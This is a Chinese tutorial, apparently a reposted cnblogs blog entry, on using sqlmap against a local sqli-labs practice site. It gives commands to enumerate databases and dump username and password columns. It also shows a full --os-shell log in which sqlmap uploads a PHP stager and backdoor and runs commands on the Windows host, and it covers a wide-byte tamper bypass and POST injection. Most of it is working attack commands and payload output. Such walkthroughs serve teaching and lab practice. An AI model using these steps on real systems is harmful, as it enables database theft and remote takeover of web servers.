• SQLmap的基本使用方法


    其他注入工具
    明小子
    穿山甲
    啊D
     
     
     
    确定注入点后测试
    root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1
     
    当前数据库
    sqlmap.py -u http://localhost/sqli/Less-1/?id=1 --current-db
    root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 --current-db
     
    其他数据库
    --dbs
    root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -dbs
     
    数据库内表
    -D security --tables
    root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -D security --tables
     
    表内字段
    -D security -T users --columns
    root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -D security -T users --columns
     
    -D security -T users -C username,password --dump
    root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 -D security -T users -C username,password --dump
     
    注入木马
    root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-7/?id=1 --os-shell
     
    C:/phpstudy_pro/WWW
     
    sqlmap.py -u http://localhost/sqli/Less-7/?id=1 --os-shell
     
    root@kali:~# sqlmap -u http://192.168.2.12/sqli/Less-1/?id=1 --os-shell
    ___
    __H__
    ___ ___["]_____ ___ ___ {1.4.7#stable}
    |_ -| . [,] | .'| . |
    |___|_ [)]_|_|_|__,| _|
    |_|V... |_| http://sqlmap.org
     
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
     
    [*] starting @ 22:51:21 /2020-12-28/
     
    [22:51:21] [INFO] resuming back-end DBMS 'mysql'
    [22:51:21] [INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 4954=4954 AND 'HBhg'='HBhg
     
    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a717a71,(SELECT (ELT(1554=1554,1))),0x716b6b6a71,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'HyHQ'='HyHQ
     
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 5466 FROM (SELECT(SLEEP(5)))fXNK) AND 'oDCa'='oDCa
     
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-8233' UNION ALL SELECT NULL,CONCAT(0x716a717a71,0x4666737259654f717656494b4e664d47434c55644a4e764d766d6a6c5a6f74726e71584f6c686358,0x716b6b6a71),NULL-- -
    ---
    [22:51:22] [INFO] the back-end DBMS is MySQL
    back-end DBMS: MySQL >= 5.5
    [22:51:22] [INFO] going to use a web backdoor for command prompt
    [22:51:22] [INFO] fingerprinting the back-end DBMS operating system
    [22:51:23] [INFO] the back-end DBMS operating system is Windows
    which web application language does the web server support?
    [1] ASP (default)
    [2] ASPX
    [3] JSP
    [4] PHP
    > 4
    do you want sqlmap to further try to provoke the full path disclosure? [Y/n]
    [22:51:28] [WARNING] unable to automatically retrieve the web server document root
    what do you want to use for writable directory?
    [1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
    [2] custom location(s)
    [3] custom directory list file
    [4] brute force search
    > 2
    please provide a comma separate list of absolute directory paths: C:phpstudy_proWWW
    [22:51:40] [WARNING] unable to automatically parse any web server path
    [22:51:40] [INFO] trying to upload the file stager on 'C:/phpstudy_pro/WWW/' via LIMIT 'LINES TERMINATED BY' method
    [22:51:41] [INFO] the file stager has been successfully uploaded on 'C:/phpstudy_pro/WWW/' - http://192.168.2.12:80/tmpucxne.php
    [22:51:41] [INFO] the backdoor has been successfully uploaded on 'C:/phpstudy_pro/WWW/' - http://192.168.2.12:80/tmpbuonw.php
    [22:51:41] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
    os-shell>
    os-shell> ipconfig
    do you want to retrieve the command standard output? [Y/n/a]
    command standard output:
    ---
     
    Windows IP 配置
     
     
    以太网适配器 本地连接:
     
    连接特定的 DNS 后缀 . . . . . . . : localdomain
    本地链接 IPv6 地址. . . . . . . . : fe80::e488:cc63:a814:b8ab
    IPv4 地址 . . . . . . . . . . . . : 192.168.2.12
    子网掩码 . . . . . . . . . . . . : 255.255.255.0
    默认网关. . . . . . . . . . . . . : 192.168.2.2
     
    隧道适配器 isatap.localdomain:
     
    媒体状态 . . . . . . . . . . . . : 媒体已断开
    连接特定的 DNS 后缀 . . . . . . . : localdomain
    ---
     
     
    宽字节注入
    使用unmagicquotes方法进行宽字节绕过
    sqlmap.py -u http://127.0.0.1/Less-32/?id=1 --tamper "unmagicquotes" --dbs
     
    其他绕过脚本都存放在sqlmap的/tamper/目录下
    例如kali:/usr/share/sqlmap/tamper/
     
    脚本具体用途自行百度
    https://www.cnblogs.com/mark0/p/12349551.html
     
     
    抓取POST包,标记注入
    1.burp抓取POST包导出
    2.mysql -r [文件路径/文件名]
    3.后续参数一样

    如内容有误,欢迎评论区提出建议与意见。
  • 相关阅读:
    hdu 2296 AC自动机+DP+路径字符串记录(较麻烦)
    HDU
    hdu 2243(poj2778的加强版!(AC自动机+矩阵))
    Poj3691(AC自动机+DP(简单题))
    后台样式升级1.
    那些可以在数据库里做的事:分页与过滤
    常用的几个单页应用程序网站分享
    Javascript生成二维码(QR)
    户端页面中读取串口操作
    GridView事件分析
  • 原文地址:https://www.cnblogs.com/Tzsblog/p/14234441.html
Copyright © 2020-2023  润新知